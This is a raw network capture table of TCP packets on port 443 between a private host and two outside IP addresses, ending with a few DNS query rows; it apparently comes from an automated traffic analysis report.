                                                    Dec 18, 2024 11:23:34.266565084 CET4434974788.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:23:34.266732931 CET49747443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:23:34.267097950 CET4434974788.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:23:34.267136097 CET4434974788.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:23:34.267244101 CET49747443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:23:34.267410994 CET49747443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:23:34.267426014 CET4434974788.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:23:34.267596006 CET49747443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:23:34.267723083 CET4434974788.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:23:34.267757893 CET4434974788.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:23:34.268008947 CET49747443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:23:34.268029928 CET4434974788.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:23:34.268747091 CET49747443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:23:34.548995018 CET4434974788.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:23:34.549004078 CET4434974788.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:23:34.549074888 CET4434974788.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:23:34.549338102 CET49747443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:23:34.549361944 CET4434974788.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:23:34.549458981 CET4434974788.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:23:34.549617052 CET49747443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:23:34.549635887 CET4434974788.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:23:34.549669981 CET49747443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:23:34.549926996 CET4434974788.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:23:34.549933910 CET49747443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:23:34.549952030 CET4434974788.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:23:34.550043106 CET4434974788.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:23:34.550267935 CET49747443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:23:34.550288916 CET4434974788.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:23:34.550451040 CET4434974788.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:23:34.550486088 CET4434974788.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:23:34.550545931 CET49747443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:23:34.550563097 CET4434974788.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:23:34.550621033 CET49747443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:23:34.550695896 CET49747443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:23:34.550800085 CET49747443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:23:34.550913095 CET4434974788.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:23:34.550936937 CET4434974788.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:23:34.551089048 CET49747443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:23:34.551244020 CET49747443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:23:34.551250935 CET4434974788.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:23:34.551373005 CET4434974788.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:23:34.551410913 CET49747443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:23:34.551420927 CET4434974788.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:23:34.551613092 CET49747443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:23:34.551682949 CET49747443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:23:34.551701069 CET4434974788.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:23:34.551821947 CET4434974788.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:23:34.551845074 CET4434974788.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:23:34.551997900 CET49747443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:23:34.552016020 CET4434974788.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:23:34.552081108 CET49747443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:23:34.552202940 CET4434974788.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:23:34.552229881 CET4434974788.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:23:34.552244902 CET49747443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:23:34.552263975 CET4434974788.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:23:34.552402020 CET49747443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:23:34.552555084 CET49747443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:23:34.552562952 CET4434974788.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:23:34.552634001 CET4434974788.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:23:34.552658081 CET4434974788.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:23:34.552872896 CET49747443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:23:34.552891970 CET4434974788.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:23:34.552958012 CET49747443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:23:34.553080082 CET4434974788.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:23:34.553086042 CET49747443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:23:34.553105116 CET4434974788.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:23:34.553114891 CET4434974788.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:23:34.553262949 CET49747443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:23:34.553262949 CET49747443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:23:34.553360939 CET49747443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:23:34.553380966 CET4434974788.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:23:34.553567886 CET4434974788.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:23:34.553590059 CET4434974788.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:23:34.553713083 CET49747443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:23:34.553728104 CET4434974788.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:23:34.553896904 CET49747443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:23:34.554008961 CET4434974788.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:23:34.554033041 CET4434974788.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:23:34.554183960 CET49747443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:23:34.554338932 CET49747443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:23:34.554358006 CET4434974788.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:23:34.554512978 CET4434974788.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:23:34.554594994 CET4434974788.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:23:34.554673910 CET49747443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:23:34.554692984 CET4434974788.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:23:34.554846048 CET49747443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:23:34.554955006 CET4434974788.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:23:34.554976940 CET4434974788.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:23:34.555239916 CET49747443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:23:34.555253983 CET4434974788.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:23:34.555334091 CET49747443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:23:34.555466890 CET4434974788.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:23:34.555491924 CET4434974788.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:23:34.555620909 CET49747443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:23:34.555630922 CET4434974788.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:23:34.555695057 CET49747443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:23:34.555901051 CET49747443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:23:34.555917978 CET4434974788.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:23:34.555947065 CET4434974788.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:23:34.556094885 CET49747443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:23:34.556224108 CET49747443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:23:34.556233883 CET4434974788.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:23:34.556353092 CET4434974788.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:23:34.556441069 CET4434974788.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:23:34.556523085 CET49747443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:23:34.556533098 CET4434974788.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:23:34.556667089 CET49747443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:23:34.556726933 CET4434974788.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:23:34.556751013 CET4434974788.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:23:34.556926966 CET49747443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:23:34.556938887 CET4434974788.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:23:34.557060003 CET49747443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:23:34.557109118 CET4434974788.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:23:34.557226896 CET4434974788.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:23:34.557336092 CET49747443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:23:34.557348013 CET4434974788.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:23:34.557385921 CET49747443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:23:34.557490110 CET4434974788.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:23:34.557507992 CET49747443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:23:34.557513952 CET4434974788.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:23:34.557524920 CET4434974788.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:23:34.557694912 CET4434974788.218.116.137192.168.11.20
                                                    Dec 18, 2024 11:23:34.557718039 CET49747443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:23:34.557898045 CET49747443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:23:34.558054924 CET49747443192.168.11.2088.218.116.137
                                                    Dec 18, 2024 11:23:35.933384895 CET49748443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:23:35.933475971 CET44349748104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:23:35.933701992 CET49748443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:23:35.933810949 CET49748443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:23:35.933845997 CET44349748104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:23:36.229584932 CET44349748104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:23:36.230709076 CET49748443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:23:36.230768919 CET44349748104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:23:37.058495998 CET44349748104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:23:37.058712006 CET44349748104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:23:37.058851004 CET44349748104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:23:37.058887959 CET49748443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:23:37.058958054 CET44349748104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:23:37.059132099 CET44349748104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:23:37.059272051 CET49748443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:23:37.059288979 CET44349748104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:23:37.059318066 CET44349748104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:23:37.059492111 CET49748443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:23:37.059559107 CET44349748104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:23:37.059698105 CET44349748104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:23:37.059777975 CET49748443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:23:37.059833050 CET44349748104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:23:37.059967995 CET44349748104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:23:37.059983969 CET49748443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:23:37.060018063 CET44349748104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:23:37.060225964 CET44349748104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:23:37.060256958 CET49748443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:23:37.060312033 CET44349748104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:23:37.060405970 CET44349748104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:23:37.060499907 CET49748443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:23:37.060554981 CET44349748104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:23:37.060735941 CET49748443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:23:37.060823917 CET44349748104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:23:37.060988903 CET44349748104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:23:37.061000109 CET49748443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:23:37.061036110 CET44349748104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:23:37.061170101 CET44349748104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:23:37.061261892 CET49748443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:23:37.061316013 CET44349748104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:23:37.061574936 CET49748443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:23:37.061626911 CET44349748104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:23:37.061758995 CET44349748104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:23:37.061964989 CET49748443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:23:37.061989069 CET44349748104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:23:37.062567949 CET44349748104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:23:37.062750101 CET44349748104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:23:37.062843084 CET49748443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:23:37.062885046 CET44349748104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:23:37.062911987 CET44349748104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:23:37.063128948 CET49748443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:23:37.063167095 CET44349748104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:23:37.063323975 CET49748443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:23:37.063354015 CET44349748104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:23:37.063602924 CET49748443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:23:37.063658953 CET44349748104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:23:37.064169884 CET44349748104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:23:37.064317942 CET44349748104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:23:37.064418077 CET49748443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:23:37.064485073 CET44349748104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:23:37.064515114 CET44349748104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:23:37.064750910 CET49748443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:23:37.064755917 CET44349748104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:23:37.064817905 CET44349748104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:23:37.064965010 CET49748443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:23:37.065581083 CET44349748104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:23:37.065857887 CET49748443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:23:37.065905094 CET44349748104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:23:37.065938950 CET44349748104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:23:37.066179991 CET49748443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:23:37.199997902 CET44349748104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:23:37.200257063 CET49748443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:23:37.200486898 CET44349748104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:23:37.200695992 CET49748443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:23:37.200891972 CET44349748104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:23:37.201041937 CET44349748104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:23:37.201067924 CET49748443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:23:37.201122046 CET44349748104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:23:37.201189041 CET49748443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:23:37.201730967 CET44349748104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:23:37.201989889 CET49748443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:23:37.202004910 CET44349748104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:23:37.202039003 CET44349748104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:23:37.202147961 CET49748443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:23:37.202239990 CET49748443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:23:37.202727079 CET44349748104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:23:37.202867031 CET49748443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:23:37.202907085 CET44349748104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:23:37.203061104 CET49748443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:23:37.203603029 CET44349748104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:23:37.203819990 CET49748443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:23:37.204339981 CET44349748104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:23:37.204483032 CET49748443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:23:37.204619884 CET49748443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:23:37.204996109 CET44349748104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:23:37.205282927 CET49748443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:23:37.205339909 CET44349748104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:23:37.205548048 CET49748443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:23:37.205764055 CET44349748104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:23:37.206046104 CET49748443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:23:37.206684113 CET44349748104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:23:37.206908941 CET49748443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:23:37.207396030 CET44349748104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:23:37.207623959 CET49748443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:23:37.208133936 CET44349748104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:23:37.208304882 CET49748443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:23:37.208429098 CET49748443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:23:37.208854914 CET44349748104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:23:37.209146976 CET49748443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:23:37.209167957 CET44349748104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:23:37.209201097 CET44349748104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:23:37.209399939 CET49748443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:23:37.251599073 CET44349748104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:23:37.251823902 CET49748443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:23:37.304308891 CET49748443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:23:37.340960026 CET44349748104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:23:37.341227055 CET49748443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:23:37.341567993 CET44349748104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:23:37.341820002 CET49748443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:23:37.342017889 CET44349748104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:23:37.342221022 CET49748443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:23:37.342655897 CET44349748104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:23:37.342854977 CET49748443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:23:37.342920065 CET44349748104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:23:37.343132019 CET49748443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:23:37.344131947 CET44349748104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:23:37.344398975 CET49748443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:23:37.344456911 CET44349748104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:23:37.344489098 CET44349748104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:23:37.344635010 CET49748443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:23:37.344705105 CET49748443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:23:37.344777107 CET44349748104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:23:37.345019102 CET49748443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:23:37.345165014 CET44349748104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:23:37.345334053 CET49748443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:23:37.345437050 CET49748443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:23:37.345864058 CET44349748104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:23:37.346113920 CET49748443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:23:37.346366882 CET44349748104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:23:37.346643925 CET49748443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:23:37.346697092 CET44349748104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:23:37.346837044 CET44349748104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:23:37.346884012 CET49748443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:23:37.346935034 CET44349748104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:23:37.347136021 CET49748443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:23:37.347567081 CET44349748104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:23:37.347780943 CET49748443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:23:37.347834110 CET44349748104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:23:37.348087072 CET49748443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:23:37.348295927 CET44349748104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:23:37.348542929 CET49748443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:23:37.348999023 CET44349748104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:23:37.349181890 CET49748443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:23:37.349335909 CET49748443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:23:37.350148916 CET44349748104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:23:37.350434065 CET49748443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:23:37.350513935 CET44349748104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:23:37.350651979 CET49748443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:23:37.350718021 CET49748443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:23:37.350929022 CET44349748104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:23:37.351270914 CET49748443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:23:37.351861954 CET44349748104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:23:37.352041960 CET49748443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:23:37.352202892 CET49748443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:23:37.352257967 CET44349748104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:23:37.352288961 CET44349748104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:23:37.352514029 CET49748443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:23:37.352566004 CET44349748104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:23:37.352596045 CET44349748104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:23:37.352819920 CET49748443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:23:37.353115082 CET44349748104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:23:37.353446007 CET49748443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:23:37.355803013 CET44349748104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:23:37.355880976 CET44349748104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:23:37.355976105 CET49748443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:23:37.356043100 CET49748443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:23:37.356076002 CET44349748104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:23:37.356194019 CET49748443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:23:37.357158899 CET44349748104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:23:37.357333899 CET49748443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:23:37.357386112 CET44349748104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:23:37.357422113 CET49748443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:23:37.359622955 CET44349748104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:23:37.359710932 CET44349748104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:23:37.359910011 CET49748443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:23:37.359967947 CET44349748104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:23:37.359987974 CET49748443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:23:37.362127066 CET44349748104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:23:37.362195015 CET44349748104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:23:37.362387896 CET49748443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:23:37.362447977 CET44349748104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:23:37.362463951 CET49748443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:23:37.362587929 CET49748443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:23:37.365124941 CET44349748104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:23:37.365206003 CET44349748104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:23:37.365312099 CET49748443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:23:37.365366936 CET44349748104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:23:37.365442991 CET49748443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:23:37.367424011 CET44349748104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:23:37.367496014 CET44349748104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:23:37.367681980 CET49748443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:23:37.367753029 CET44349748104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:23:37.367774010 CET49748443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:23:37.369954109 CET44349748104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:23:37.370012999 CET44349748104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:23:37.370157957 CET49748443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:23:37.370178938 CET44349748104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:23:37.370229006 CET49748443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:23:37.370244026 CET44349748104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:23:37.370405912 CET44349748104.21.10.224192.168.11.20
                                                    Dec 18, 2024 11:23:37.370486975 CET49748443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:23:37.370541096 CET49748443192.168.11.20104.21.10.224
                                                    Dec 18, 2024 11:23:37.370668888 CET49748443192.168.11.20104.21.10.224
                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Dec 18, 2024 11:17:14.713952065 CET6195253192.168.11.201.1.1.1
                                                    Dec 18, 2024 11:17:15.715919018 CET6195253192.168.11.209.9.9.9
                                                    Dec 18, 2024 11:17:15.944108963 CET53619521.1.1.1192.168.11.20
